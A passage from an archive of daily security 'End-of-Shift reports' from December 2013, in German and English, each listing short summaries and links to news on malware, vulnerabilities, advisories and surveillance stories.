vulnerability-exploiting hostage under the control of attackers. --------------------------------------------- http://arstechnica.com/security/2013/12/anatomy-of-a-hack-what-a-successful… *** Turkey Tops World in Per Capita Malware Encounters *** --------------------------------------------- Microsoft claims that Turkish machines encounter more malware than computers in any other country in the world. --------------------------------------------- http://threatpost.com/turkey-tops-world-in-per-capita-malware-encounters/10… *** New Trojan.Mods mines bitcoins *** --------------------------------------------- Russian anti-virus company Doctor Web is warning users about a new Trojan.Mods modification that has been dubbed Trojan.Mods.10. This Trojans authors followed the major trend of December 2013 and added a bitcoin miner to the set of Trojan.Mods.10's features. You may recall that Trojan.Mods programs were found in large numbers in the wild in spring 2013 and were primarily designed to intercept browsers DNS queries and redirect users to malignant sites. --------------------------------------------- http://news.drweb.com/show/?i=4176&lng=en&c=9 *** New CryptoLocker Spreads Via Removable Drives *** --------------------------------------------- We recently came across a CryptoLocker variant that had one notable feature - it has propagation routines. Analysis of the malware, detected as WORM_CRILOCK.A, shows that this malware can spread via removable drives. This update is considered significant because this routine was unheard of in other CRILOCK variants. --------------------------------------------- http://blog.trendmicro.com/trendlabs-security-intelligence/new-cryptolocker… *** OpenSSL mit kaputter Hintertür *** --------------------------------------------- Die von der NSA als Hintertür entworfene Zufallszahlenfunktion Dual EC findet sich auch in der offenen Krypto-Bibliothek OpenSSL. Allerdings war sie dort funktionsunfähig, ohne dass es jemand bemerkt hätte. --------------------------------------------- http://www.heise.de/security/meldung/OpenSSL-mit-kaputter-Hintertuer-207237… *** Big Data and security analytics collide *** --------------------------------------------- Big Data will become "The next big thing" - a critical re-evaluation and re-tooling of our analytical abilities. This is not about being able to query more data, but being able to query all data. --------------------------------------------- http://www.scmagazine.com/big-data-and-security-analytics-collide/article/3… *** Infection found on "feedburner.com" *** --------------------------------------------- Recently we have seen the websites of MySQL and PHP.net being compromised. We have also blogged about Google Code being used as a drop site for holding malicious code. These instances clearly suggest that attackers are targeting popular websites and using them in their attacks as they are less likely to be blocked by URL filters. This time we found that Google acquired "FeedBurner", which provides custom RSS feeds and management tools to users is hosting an infected page. --------------------------------------------- http://research.zscaler.com/2013/12/infection-found-on-feedburnercom.html *** Hackers who breached php.net exposed visitors to highly unusual malware *** --------------------------------------------- Eight weeks after hackers compromised the official PHP website and laced it with attack code, outside security researchers have uncovered evidence that some visitors were exposed to malware that's highly unusual, if not unique. --------------------------------------------- http://arstechnica.com/security/2013/12/hackers-who-breached-php-net-expose… *** Python Multiple Vulnerabilities *** --------------------------------------------- https://secunia.com/advisories/56234 *** Puppet Enterprise Multiple Vulnerabilities *** --------------------------------------------- https://secunia.com/advisories/56251 *** Novell Client Bug Lets Local Users Crash the System *** --------------------------------------------- http://www.securitytracker.com/id/1029533 *** Cisco IOS XE VTY Authentication security bypass *** --------------------------------------------- http://xforce.iss.net/xforce/xfdb/89901 *** cPanel WHM XML and JSON APIs Arbitrary File Disclosure Vulnerability *** --------------------------------------------- https://secunia.com/advisories/56207 *** VMware Patches Privilege Vulnerability in ESX, ESXi *** --------------------------------------------- http://threatpost.com/vmware-patches-privilege-vulnerability-in-esx-esxi/10… *** Zimbra 8.0.2 and 7.2.2 Collaboration Server LFI Exploit *** --------------------------------------------- http://cxsecurity.com/issue/WLB-2013120155 *** Synology DiskStation Manager SLICEUPLOAD Remote Command Execution *** --------------------------------------------- http://cxsecurity.com/issue/WLB-2013120156 *** RT: Request Tracker 4.0.10 SQL Injection *** --------------------------------------------- http://cxsecurity.com/issue/WLB-2013040083 *** Bugtraq: Song Exporter v2.1.1 RS iOS - File Include Vulnerabilities *** --------------------------------------------- http://www.securityfocus.com/archive/1/530489

1 0

Tageszusammenfassung - Montag 23-12-2013
by Daily end-of-shift report 23 Dec '13

23 Dec '13

======================= = End-of-Shift report = ======================= Timeframe: Freitag 20-12-2013 18:00 − Montag 23-12-2013 18:00 Handler: L. Aaron Kaplan Co-Handler: Stephan Richter *** What to Expect in Surveillance Politics in 2014 (Hint: It's Not Reform) *** --------------------------------------------- You would think that a federal district judge calling the NSA program almost Orwellian would be a good sign for surveillance and privacy in 2014. If you're holding out hope for an act of political courage to end bulk surveillance ... --------------------------------------------- http://www.wired.com/opinion/2013/12/dont-get-too-excited-about-recent-ruli… *** DHS Turns To Unpaid Interns For Nations Cyber Security *** --------------------------------------------- theodp writes "A week after President Obama stressed the importance of computer science to America, the Department of Homeland Security put out a call for 100+ of the nations best-and-brightest college students to work for nothing on the nations cyber security. The unpaid internship program, DHS notes, is the realization of recommendations (PDF) from the Homeland Security Advisory Councils Task Force on CyberSkills, which included execs from Facebook, Lockheed Martin, and Sony, and was... --------------------------------------------- http://rss.slashdot.org/~r/Slashdot/slashdot/~3/leJ5tNqGbgU/story01.htm *** Microsoft Security Essentials Misses 39% of Malware *** --------------------------------------------- Barence writes "The latest tests from Dennis Publishings security labs saw Microsoft Security Essentials fail to detect 39% of the real-world malware thrown at it. Dennis Technology Labs (DTL) tested nine home security products on a Windows 7 PC, including Security Essentials, which is distributed free to Windows users and built into Windows 8 in the form of Windows Defender. While the other eight packages all achieved protection scores of 87% or higher - with five scoring 98% or 99%.. --------------------------------------------- http://rss.slashdot.org/~r/Slashdot/slashdot/~3/8Vg-UHP2dqo/story01.htm *** Kritische Sicherheitslücken in Write-Blocker entdeckt *** --------------------------------------------- Gleich mehrere Sicherheitslücken entdeckte ein IT-Forensik-Experte in dem neuen Write-Blocker Ditto. Die Folge: Statt seine eigentliche Arbeit zu verrichten, kann das Gerät selbst als Angriffswerkzeug missbraucht werden und Untersuchungen torpedieren. --------------------------------------------- http://www.heise.de/security/meldung/Kritische-Sicherheitsluecken-in-Write-… *** Strange DNS Queries - Request for Packets, (Sat, Dec 21st) *** --------------------------------------------- We have received a pcap sample of DNS queries that display a strange behavior. The queries are type ANY for domains ghmn.ru and fkfkfkfa.com. When doing a nslookup, both domains have 100 IPs listed under their domain names with each of them resolving exactly the same last octets (i.e. .1, .10, .100, etc). Queries with the same transaction ID are often repeated several times. The traffic samples we have received indicate the queries are sent by either a host or a server. If anyone else is... --------------------------------------------- http://isc.sans.edu/diary.html?storyid=17264&rss *** evasiOn7: Jailbreak für iOS 7 - mit umstrittenen Funktionen *** --------------------------------------------- Ein erster Jailbreak für iOS 7, mit dem sich Apps jenseits von Apples App Store installieren lassen, ist verfügbar. Er geriet allerdings wegen Integration eines chinesischen App Stores mit Raubkopien und wegen Verschleierung des Codes gleich in Verruf. --------------------------------------------- http://www.heise.de/security/meldung/evasiOn7-Jailbreak-fuer-iOS-7-mit-umst… *** Backdoor in Krypto-Software: RSA Security dementiert NSA-Zahlungen *** --------------------------------------------- Man habe "niemals einen geheimen Vertrag mit der NSA geschlossen, um einen bekannt anfälligen Zufallszahlengenerator in die Verschlüsselungsbibliotheken von BSAFE zu integrieren", betont RSA Security - leugnet aber keineswegs Zusammenarbeit mit der NSA. --------------------------------------------- http://www.heise.de/newsticker/meldung/Backdoor-in-Krypto-Software-RSA-Secu… *** Anti-Bruteforce-Tool DenyHosts sperrt Admins aus *** --------------------------------------------- Admins, die ihre Server mit DenyHosts vor Brute-Force-Angriffen schützen, müssen handeln - andernfalls stehen sie möglicherweise bald vor verschlossenen Türen. --------------------------------------------- http://www.heise.de/newsticker/meldung/Anti-Bruteforce-Tool-DenyHosts-sperr… *** How I hacked a journalist *** --------------------------------------------- It started off as a follow-up to a story a journalist had written several years ago. The story was about data protection, and had showed that a simple subject access request could provide you with enough information to steal someone's identity. Now, Claudia Joseph wanted to see if anything had changed and to update the world on the new dangers. What would happen if somebody was able to infiltrate your online life? Claudia contacted us and started the conversation with "Can you hack... --------------------------------------------- http://www.nccgroup.com/en/blog/2013/12/how-i-hacked-a-journalist/ *** Practical malleability attack against CBC-Encrypted LUKS partitions *** --------------------------------------------- Topic: Practical malleability attack against CBC-Encrypted LUKS partitions Risk: Medium Text:Article location: http://www.jakoblell.com/blog/2013/12/22/practical-malleability-attack-agai…... --------------------------------------------- http://cxsecurity.com/issue/WLB-2013120153 *** Alert: Adobe License Key Email Scam *** --------------------------------------------- Adobe is aware of reports that a phishing campaign is underway involving malicious email purporting to deliver license keys for a variety of Adobe offerings. Customers who receive one of these emails should delete it immediately without downloading attachments or... --------------------------------------------- http://blogs.adobe.com/psirt/2013/12/20/alert-adobe-license-key-email-scam/ *** [webapps] - Jenkins 1.523 - Inject Persistent HTML Code *** --------------------------------------------- http://www.exploit-db.com/exploits/30408 *** Security Bulletin: Multiple vulnerabilities in current IBM SDK for Java for WebSphere Application Server Community 3.0.0.4 October 2013 CPU (CVE-2013-5802,CVE-2013-5825) *** --------------------------------------------- Multiple security vulnerabilities exist in the IBM SDK for Java that is shipped with IBM WebSphere Application Server Community 3.0.0.4. CVE(s): CVE-2013-5802, and CVE-2013-5825 Affected product(s) and affected version(s): WebSphere Application Server Community Edition 3.0.0.4 Refer to the following reference URLs for remediation and additional vulnerability details: Source Bulletin: http://www.ibm.com/support/docview.wss?uid=swg21660594 X-Force Database:... --------------------------------------------- https://www-304.ibm.com/connections/blogs/PSIRT/entry/security_bulletin_mul… *** Security Bulletin: Fix available for Unauthorized Information Retrieval Security Vulnerability in IBM WebSphere Portal (CVE-2013-6735) *** --------------------------------------------- A fix that blocks unauthorized information retrieval is available for a security vulnerability in IBM WebSphere Portal. --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg21660289 *** Wordpress information leakage and backdoor in writing settings *** --------------------------------------------- Topic: Wordpress information leakage and backdoor in writing settings Risk: High Text:Hello list! As Ive announced earlier (http://seclists.org/fulldisclosure/2013/Nov/219), I conducted a Day of bugs in WordPr... --------------------------------------------- http://cxsecurity.com/issue/WLB-2013120152 *** Synology DiskStation Manager (DSM) multiple scripts directory traversal *** --------------------------------------------- http://xforce.iss.net/xforce/xfdb/89892 *** Avant Browser Rendering Engines Multiple Vulnerabilities *** --------------------------------------------- https://secunia.com/advisories/56242 *** Nagios "process_cgivars()" Off-By-One Vulnerability *** --------------------------------------------- https://secunia.com/advisories/55976 Next End-of-Shift Report on 2013-12-27

1 0

Tageszusammenfassung - Freitag 20-12-2013
by Daily end-of-shift report 20 Dec '13

20 Dec '13

======================= = End-of-Shift report = ======================= Timeframe: Donnerstag 19-12-2013 18:00 − Freitag 20-12-2013 18:00 Handler: Robert Waldner Co-Handler: Stephan Richter *** Do You Hear What I Hear? *** --------------------------------------------- This article, recently published in the Journal of Communications, adds another log to the BadBIOS fire. It has been stated that devices in the BadBIOS case are communicating across an air-gap with commodity PC audio hardware. This paper clearly spells out one workable way to communicate in this way. Even if this doesn't end up... --------------------------------------------- http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/XrnMZDjVZpk/ *** NSA's broken Dual_EC random number generator has a "fatal bug" in OpenSSL *** --------------------------------------------- No plans to fix a bug in "toxic" algorithm that no one seems to use. --------------------------------------------- http://feeds.arstechnica.com/~r/arstechnica/security/~3/DAvvFpw-R04/story01… *** Microsoft warnt vor signierter Malware *** --------------------------------------------- Immer mehr Schädlinge tragen eine gültige digitale Signatur. Die Unterschriften werden typischerweise mit gestohlenen Entwicklerzertifikaten erstellt. --------------------------------------------- http://www.heise.de/security/meldung/Microsoft-warnt-vor-signierter-Malware… *** Exploiting Password Recovery Functionalities *** --------------------------------------------- Password recovery functionalities can result in vulnerabilities in the same application they are intended to protect. Vulnerabilities such as username enumeration (showing different error messages when the user exists or not in the database), sensitive information disclosure (sending the password in clear-text by e-mail to user) and recover password message hijack (involving an attacker receiving a copy of the recover password message) are some common vulnerabilities that may be found in a... --------------------------------------------- http://blog.spiderlabs.com/2013/12/exploiting-password-recovery-functionali… *** Quick Joomla Refresher *** --------------------------------------------- I havent come into contact with Joomla for a while, but I had the opportunity recently in a penetration test of a web site that was running the popular Content Management System (CMS). In this blog post I mention some of the tools I used to check the security of a particular Joomla installation and comment upon their effectiveness. Depending on your source, Joomla is within the top five contenders for the most popular CMS. Alternatives include WordPress, Drupal and others. CMS frameworks have... --------------------------------------------- http://blog.spiderlabs.com/2013/12/quick-joomla-refresher.html *** Not quite the average exploit kit: Zuponcic *** --------------------------------------------- This post connects three recent developments in the realm of malware infections: .htaccess server compromise, the Zuponcic exploit kit and the Ponmocup botnet. It seems that the defacto standard of exploit kits is getting competition. Understanding how this exploit kit works will give you a better chance of defending against it and for identifying the .htaccess compromise on your server. --------------------------------------------- http://blog.fox-it.com/2013/12/19/not-quite-the-average-exploit-kit-zuponci… *** Nach BKA-Einsatz: ZeroAccess-Botnetz streicht die Segel *** --------------------------------------------- Die Drahtzieher hinter dem ZeroAccess-Botnetz schwenken die virtuelle weiße Fahne. Nach weiteren Aktionen der Strafverfolgungsbehörden haben sie das Bot hüten anscheinend vorerst aufgegeben. --------------------------------------------- http://www.heise.de/security/meldung/Nach-BKA-Einsatz-ZeroAccess-Botnetz-st… *** Digitale Forensik: Ungelöste Probleme bei Beweissicherung digitaler Artefakte *** --------------------------------------------- Etliche Probleme der Beweissicherung digitaler Artefakte sind noch längst nicht gelöst, zeigte sich auf dem Workshop Forensik und Internetkriminalität. Dazu lieferte das BSI ein Lagebild, das von einem ungebrochenen Anstieg der Netzkriminalität ausgeht. --------------------------------------------- http://www.heise.de/security/meldung/Digitale-Forensik-Ungeloeste-Probleme-… *** BitTorrent stellt Peer-to-Peer-Chat-System vor *** --------------------------------------------- Als Antwort auf die flächendeckende NSA-Schnüffelei hat BitTorrent ein Chat-System entwickelt, das ohne zentralen Server auskommt und anonyme, verschlüsselte Kommunikation ermöglicht. --------------------------------------------- http://www.heise.de/security/meldung/BitTorrent-stellt-Peer-to-Peer-Chat-Sy… *** Erneute Lücke in OpenX wird aktiv ausgenutzt *** --------------------------------------------- Kritische Sicherheitslücken in der aktuellen Version der Anzeigen-Server-Software OpenX und in dessen Fork Revive werden genutzt, um Schad-Software zu verteilen. Das CERT-Bund benachrichtigt täglich mehrere betroffene Server-Betreiber. --------------------------------------------- http://www.heise.de/security/meldung/Erneute-Luecke-in-OpenX-wird-aktiv-aus… *** Viren-Statistiken: Rückblick finster, Ausblick noch finsterer *** --------------------------------------------- Das Jahr 2014 hält für Smartphone-Benutzer besonders viele digitale Angriffe bereit, sagen Antivirenhersteller nach Auswertung ihrer Statistiken. --------------------------------------------- http://www.heise.de/security/meldung/Viren-Statistiken-Rueckblick-finster-A… *** RSA Archer eGRC Input Validation Flaws Permit Cross-Site Scripting Attacks *** --------------------------------------------- http://www.securitytracker.com/id/1029523 *** WordPress URL Redirector Abuse and XSS vulnerabilities *** --------------------------------------------- Topic: WordPress URL Redirector Abuse and XSS vulnerabilities Risk: Low Text:Hello list! As Ive announced earlier (http://seclists.org/fulldisclosure/2013/Nov/219), I conducted a Day of bugs in WordP... --------------------------------------------- http://cxsecurity.com/issue/WLB-2013120142 *** Google Picasa RAW Image Parsing Multiple Vulnerabilities *** --------------------------------------------- https://secunia.com/advisories/55555 *** cPanel Multiple Vulnerabilities *** --------------------------------------------- https://secunia.com/advisories/56146 *** Hitachi Cosminexus Products XML External Entities Information Disclosure Vulnerability *** --------------------------------------------- https://secunia.com/advisories/56142 *** IBM Security Access Manager for Enterprise Single Sign-On Security Issue and Two Vulnerabilities *** --------------------------------------------- https://secunia.com/advisories/56176 *** Revive Adserver "what" SQL Injection Vulnerability *** --------------------------------------------- https://secunia.com/advisories/55963 *** Apache Santuario DTD Processing Flaw Lets Remote Users Deny Service *** --------------------------------------------- http://www.securitytracker.com/id/1029524 *** Apple Motion Memory Access Error Lets Remote Users Execute Arbitrary Code *** --------------------------------------------- http://www.securitytracker.com/id/1029521

1 0

Tageszusammenfassung - Donnerstag 19-12-2013
by Daily end-of-shift report 19 Dec '13

19 Dec '13

======================= = End-of-Shift report = ======================= Timeframe: Mittwoch 18-12-2013 18:00 − Donnerstag 19-12-2013 18:00 Handler: Stephan Richter Co-Handler: Robert Waldner *** IBM HTTP Server GSKit SSLv2 Session Resuming Denial of Service Vulnerability *** --------------------------------------------- A vulnerability has been reported in IBM HTTP Server, which can be exploited by malicious people to cause a DoS (Denial of Service). --------------------------------------------- https://secunia.com/advisories/56058 *** Tor use best practices *** --------------------------------------------- To date the NSA's and FBI's primary attacks on Tor users have been MITM attacks (NSA) and hidden service web server compromises (FBI) which either sent tracking data to the Tor user's computer, compromised it, or both. Thus you need a reasonably secure system from which you can use Tor and reduce your risk of being tracked or compromised. --------------------------------------------- http://digital-era.net/tor-use-best-practices/ *** New DDoS Bot Has a Fancy For Ferrets *** --------------------------------------------- Researchers at Arbor Networks have discovered a new denial of service botnet called Trojan.Ferret. --------------------------------------------- http://threatpost.com/new-ddos-bot-has-a-fancy-for-ferrets/103226 *** WordPress S3 Video Plugin "base" Cross-Site Scripting Vulnerability *** --------------------------------------------- Input passed to the "base" GET parameter in wp-content/plugins/s3-video/views/video-management/preview_video.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. The vulnerability is confirmed in version 0.96 and reported in versions prior to 0.983. --------------------------------------------- https://secunia.com/advisories/56167 *** IrfanView GIF buffer overflow *** --------------------------------------------- IrfanView is vulnerable to a heap-based buffer overflow, caused by improper bounds checking when processing the LZW code stream within GIF files. By persuading a victim to open a specially-crafted GIF file containing an overly long LZW code stream, a remote attacker could overflow a buffer and execute arbitrary code on the system or cause the application to crash. --------------------------------------------- http://xforce.iss.net/xforce/xfdb/89820 *** NovaTech Orion DNP3 Improper Input Validation Vulnerability *** --------------------------------------------- Adam Crain of Automatak and independent researcher Chris Sistrunk have identified an improper input validation vulnerability in the NovaTech Orion Substation Automation Platform. NovaTech has produced a firmware update that mitigates this vulnerability. The researchers have tested the firmware update to validate that it resolves the vulnerability.This vulnerability could be exploited remotely. --------------------------------------------- http://ics-cert.us-cert.gov/advisories/ICSA-13-352-01 *** IBM iNotes email message active content cross-site scripting *** --------------------------------------------- IBM iNotes is vulnerable to cross-site scripting, caused by improper validation of active content within an email message. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials or other sensitive information. --------------------------------------------- http://xforce.iss.net/xforce/xfdb/86594 *** IBM iNotes ultra-light mode persistent cross-site scripting *** --------------------------------------------- IBM iNotes is vulnerable to cross-site scripting in the ultra-light mode, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability to inject and execute malicious script in a victim's Web browser within the security context of the hosting Web site, once the page is viewed. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials or other sensitive information. --------------------------------------------- http://xforce.iss.net/xforce/xfdb/86595 *** SSA-742938 (Last Update 2013-12-17): Open Ports in SINAMICS S/G Firmware *** --------------------------------------------- SSA-742938 (Last Update 2013-12-17): Open Ports in SINAMICS S/G Firmware --------------------------------------------- https://www.siemens.com/innovation/pool/de/forschungsfelder/siemens_securit… *** SA-CONTRIB-2013-098 - Ubercart - Session Fixation Vulnerability *** --------------------------------------------- Advisory ID: DRUPAL-SA-CONTRIB-2013-098Project: Ubercart (third-party module)Version: 6.x, 7.xDate: 2013-12-18Security risk: Less criticalExploitable from: RemoteVulnerability: Session FixationDescriptionThe Ubercart module for Drupal provides a shopping cart and e-commerce features for Drupal.The module doesnt sufficiently protect against session fixation attacks when a user is automatically logged in to a newly created account during checkout.This vulnerability is mitigated by the fact that --------------------------------------------- https://drupal.org/node/2158651 *** Researchers propose international vulnerability purchase plan *** --------------------------------------------- In a bid to cut down on costs and eliminate potential misuse, NSS Labs has put forth an initiative imploring vendors to purchase vulnerabilities. --------------------------------------------- http://feedproxy.google.com/~r/SCMagazineHome/~3/I9nD_zWQzsI/ *** cURL Certificate Validation Flaw Lets Remote Users Spoof SSL Servers *** --------------------------------------------- A vulnerability was reported in cURL. A remote user that can conduct a man-in-the-middle attack can spoof SSL servers. The software does not properly verify the certificate CN or SAN name field in certain cases. A remote user that can conduct a man-in-the-middle attack can spoof SSL servers. Systems that use GnuTLS as the TLS backend are affected. Systems with digital signature verification (CURLOPT_SSL_VERIFYPEER) disabled are affected. --------------------------------------------- http://www.securitytracker.com/id/1029517 *** OpenJPEG Heap Overflows Let Remote Users Execute Arbitrary Code *** --------------------------------------------- Several vulnerabilities were reported in OpenJPEG. A remote user can cause arbitrary code to be executed on the target user's system. A remote user can cause denial of service conditions. A remote user can create a specially crafted image file that, when loaded by the target user, will trigger a heap overflow and execute arbitrary code on the target system [CVE-2013-6045, CVE-2013-6054]. The code will run with the privileges of the target user. A remote user can create a specially crafted image file that, when loaded by the target user, will cause the application that uses openJPEG to crash [CVE-2013-1447, CVE-2013-6052]. --------------------------------------------- http://www.securitytracker.com/id/1029514 *** Splunk Enterprise Data Processing Flaw Lets Remote Users Deny Service *** --------------------------------------------- A vulnerability was reported in Splunk Enterprise. A remote user can cause denial of service conditions. A remote user can send specially crafted data to cause the target server to become unavailable. Systems configured as data 'receivers' on the listening or receiving port(s) are affected, including instances configured as indexers and forwarders configured as intermediate forwarders. --------------------------------------------- http://www.securitytracker.com/id/1029519 *** Blog: Malware in metadata *** --------------------------------------------- One of the systems I have been running collects all our web malware detections for .ES domains. I usually check it out every morning, just in case I see something especially interesting or relevant. And when I find something, I like to create some statistics to have a global overview.There are some things that I find every time I check my stats, like URLs that have been infected for more than 200 days, even being notified. That speaks of the lack of security awareness on some companies, and how --------------------------------------------- http://www.securelist.com/en/blog/208214192/Malware_in_metadata *** Factsheet Stop using Windows XP *** --------------------------------------------- Microsoft will stop issuing Windows XP updates as of 8 April 2014. The operating system will receive the end-of-life status. The NCSC advises, together with DefCERT, Microsoft and Team High Tech Crime, to no longer use Windows XP, but to switch to another operating system. --------------------------------------------- http://www.ncsc.nl/english/services/expertise-advice/knowledge-sharing/fact… *** Cisco Unified Communications Manager Sensitive Information Disclosure Vulnerability *** --------------------------------------------- A vulnerability in the disaster recovery system (DRS) of Cisco Unified Communications Manager (UCM) could allow an authenticated, remote attacker to acquire sensitive information about DRS-related devices. --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013… *** [Announce] [security fix] GnuPG 1.4.16 released *** --------------------------------------------- Along with the publication of an interesting new side channel attack by Daniel Genkin, Adi Shamir, and Eran Tromer we announce the availability of a new stable GnuPG release to relieve this bug: Version 1.4.16. [...] Whats New =========== * Fixed the RSA Key Extraction via Low-Bandwidth Acoustic Cryptanalysis attack as described by Genkin, Shamir, and Tromer. See . [CVE-2013-4576] --------------------------------------------- http://lists.gnupg.org/pipermail/gnupg-devel/2013-December/028102.html *** Acoustic Cryptanalysis *** --------------------------------------------- This is neat: Here, we describe a new acoustic cryptanalysis key extraction attack, applicable to GnuPGs current implementation of RSA. The attack can extract full 4096-bit RSA decryption keys from laptop computers (of various models), within an hour, using the sound generated by the computer during the decryption of some chosen ciphertexts. We experimentally demonstrate that such attacks can be... --------------------------------------------- https://www.schneier.com/blog/archives/2013/12/acoustic_crypta.html *** Apache XML Security Transforms Denial of Service Vulnerability *** --------------------------------------------- A vulnerability has been reported in Apache XML Security, which can be exploited by malicious people to cause a DoS (Denial of Service) in an application using the library. The vulnerability is caused due to an error when applying Transforms and can be exploited to exhaust memory resources and cause a crash. The vulnerability is reported in versions prior to 1.5.6. --------------------------------------------- https://secunia.com/advisories/55639 *** TRENDnet Multiple Products Telnet Security Bypass Vulnerability *** --------------------------------------------- A vulnerability has been reported in multiple TRENDnet products, which can be exploited by malicious people to bypass certain security restrictions. The vulnerability is caused due to a certain undocumented functionality, which can be exploited to enable telnet management and subsequently manipulate device configuration. --------------------------------------------- https://secunia.com/advisories/55890 *** Icinga Off-By-One and Buffer Overflow Vulnerabilities *** --------------------------------------------- Some vulnerabilities have been reported in Icinga, which can be exploited by malicious users to potentially cause a DoS (Denial of Service) and compromise a vulnerable system. 1) Some boundary errors within the web interface when processing CGI parameters can be exploited to cause stack-based buffer overflows. Successful exploitation of this vulnerability may allow execution of arbitrary code. 2) An off-by-one error within the "process_cgivars()" function can be exploited to cause an out of bounds read memory access. The vulnerabilities are reported in versions prior to 1.10.2, 1.9.4, and 1.8.5. --------------------------------------------- https://secunia.com/advisories/55987 *** Icinga Cross-Site Request Forgery Vulnerability *** --------------------------------------------- A vulnerability has been reported in Icinga, which can be exploited by malicious people to conduct cross-site request forgery attacks. The application allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions if a logged-in administrator visits a malicious web site. The vulnerability is reported in version 1.10.2. Other versions may also be affected. --------------------------------------------- https://secunia.com/advisories/55990 *** A peek inside the booming underground market for stealth Bitcoin/Litecoin mining tools *** --------------------------------------------- The over-hyped market valuation of the buzzing P2P E-currency, Bitcoin, quickly gained the attention of cybercriminals internationally who promptly adapted to its sky rocketing valuation by releasing commercially available stealth Bitcoin miners, Bitcoin wallet stealing malware, as well as actually starting to offer the source code for their releases in an attempt to monetize their know-how and expertise in this area. Throughout 2013, we profiled several subscription based stealth Bitcoin --------------------------------------------- http://feedproxy.google.com/~r/WebrootThreatBlog/~3/nKXPdGwlKk4/ *** IBM Domino / iNotes Script Insertion and Cross-Site Scripting Vulnerabilities *** --------------------------------------------- Multiple vulnerabilities have been reported in IBM Domino and IBM iNotes, which can be exploited by malicious users to conduct script insertion attacks and by malicious people to conduct cross-site scripting attacks. --------------------------------------------- https://secunia.com/advisories/56164

1 0

Tageszusammenfassung - Mittwoch 18-12-2013
by Daily end-of-shift report 18 Dec '13

18 Dec '13

======================= = End-of-Shift report = ======================= Timeframe: Dienstag 17-12-2013 18:00 − Mittwoch 18-12-2013 18:00 Handler: Stephan Richter Co-Handler: n/a *** Cybercriminals offer fellow cybercriminals training in Operational Security (OPSEC) *** --------------------------------------------- In need of a fresh example that malicious and fraudulent adversaries continue professionalizing, and standardizing demanded cybercrime-friendly products and services, all for the sake of monetizing their experience and expertise in the profitable world of cybercrime? Publicly launched around the middle of 2013, a product/training course targeting novice cybercriminals is offering them a manual, recommendations for open source/free software, as well as access to a private forum set up for... --------------------------------------------- http://www.webroot.com/blog/2013/12/17/cybercriminals-offer-fellow-cybercri… *** Apple stopft Lücken in WebKit und Safari *** --------------------------------------------- Mit den Safari-Versionen 6.1.1 und 7.0.1 behebt Apple einige Speicherverwaltungsfehler in WebKit, die zur Ausführung von Schadcode über das Internet missbraucht werden können. --------------------------------------------- http://www.heise.de/security/meldung/Apple-stopft-Luecken-in-WebKit-und-Saf… *** DGA Changer Malware Able to Modify Domain-Generation Seed on the Fly *** --------------------------------------------- Malware authors have been using domain-generation algorithms for a few years now, often in botnet-related malware that needs to stay one step ahead of takedown attempts and law enforcement agencies. Now, researchers have discovered that a strain of malware that may have been part of the attack in October on PHP.net is employing a DGA... --------------------------------------------- http://threatpost.com/dga-changer-malware-able-to-modify-domain-generation-… *** The Biggest Skimmers of All: Fake ATMs *** --------------------------------------------- This blog has spotlighted some incredibly elaborate and minaturized ATM skimmers, fraud devices that thieves attach to ATMs in a bid to steal card data and PINs. But a skimmer discovered in Brazil last month takes this sort of fraud to another level, using a completely fake ATM designed to be stacked directly on top... --------------------------------------------- http://krebsonsecurity.com/2013/12/the-biggest-skimmers-of-all-fake-atms/ *** A quick look at a (new?) cross-platform DDoS botnet *** --------------------------------------------- At the beginning of December we started to observe a new botnet spreading on both Linux and Windows machines. In case of the Linux operating systems, the bot was installed through an SSH dictionary attack. The attacker logged in to compromised server and simply downloaded and executed a bot file. The malware... --------------------------------------------- https://www.cert.pl/news/7849/langswitch_lang/en *** [SECURITY] [DSA 2821-1] gnupg security update *** --------------------------------------------- http://lists.debian.org/debian-security-announce/2013/msg00235.html *** Cisco ONS 15454 Transport Node Controller Denial of Service Vulnerability *** --------------------------------------------- An issue in the tNetTaskLimit process of the Cisco ONS 15454 Transport Node Controller (TNC) could allow an unauthenticated, remote attacker to cause the TNC to reload due to a watchdog timeout. --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013… *** Security Bulletin: Multiple vulnerabilities in IBM SPSS Collaboration and Deployment Services *** --------------------------------------------- Multiple vulnerabilities exist in IBM SPSS Collaboration and Deployment Services. See the individual descriptions for details. --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg21660191 *** IBM Scale Out Network Attached Storage (SONAS) Multiple Vulnerabilities *** --------------------------------------------- Multiple vulnerabilities have been reported in IBM Scale Out Network Attached Storage, which can be exploited by malicious people to conduct spoofing attacks, disclose potentially sensitive information, bypass certain security restrictions, and compromise a user's system. --------------------------------------------- https://secunia.com/advisories/56095 *** Security Bulletin: GSKit SSL negotiation vulnerability in Tivoli Access Manager for e-business (CVE-2013-6329) *** --------------------------------------------- A vulnerability has been identified in the GSKit component utilized by Tivoli Access Manager for e-business (TAM). A specially crafted SSL message can cause the TAM server component using GSKit to crash CVE(s): CVE-2013-6329 Affected product(s) and affected version(s): All supported Tivoli Access Manager for e-business versions are affected. --------------------------------------------- https://www-304.ibm.com/connections/blogs/PSIRT/entry/security_bulletin_gsk… *** RealOne RMP File Heap Overflow Lets Remote Users Execute Arbitrary Code *** --------------------------------------------- http://www.securitytracker.com/id/1029511 *** Vuln: Juvia Ruby on Rails secret_token.rb Default Secret Key Security Bypass Vulnerability *** --------------------------------------------- http://www.securityfocus.com/bid/64368 *** Vuln: ownCloud Admin Page Unspecified Security Bypass Vulnerability *** --------------------------------------------- http://www.securityfocus.com/bid/63926 *** Zimbra Collaboration Server Unspecified Vulnerability *** --------------------------------------------- https://secunia.com/advisories/56138 *** Python Hash Collision Denial of Service Vulnerability *** --------------------------------------------- https://secunia.com/advisories/55955

1 0

Tageszusammenfassung - Dienstag 17-12-2013
by Daily end-of-shift report 17 Dec '13

17 Dec '13

